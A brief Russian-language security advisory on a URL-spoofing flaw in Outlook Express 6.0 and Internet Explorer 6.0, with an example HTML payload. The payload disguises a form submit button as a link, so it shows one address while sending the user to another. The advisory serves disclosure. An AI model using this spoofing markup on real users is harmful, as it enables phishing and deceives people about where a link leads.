Программа: Microsoft Outlook Express 6.0 и Microsoft Internet Explorer 6.0
Уязвимость обнаружена в Microsoft Outlook Express и Microsoft Internet Explorer. Удаленный пользователь может сконструировать HTML с внедренной ссылкой, которая подменит другой URL и заставит браузер отобразить неправильный URL.
Пример:
<A href="http://[apparent destination]">
<FORM action=[actual destination] method=get>
<INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt;
BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;
TEXT-DECORATION: underline" type=submit value=http://[apparent
destination]>
</A>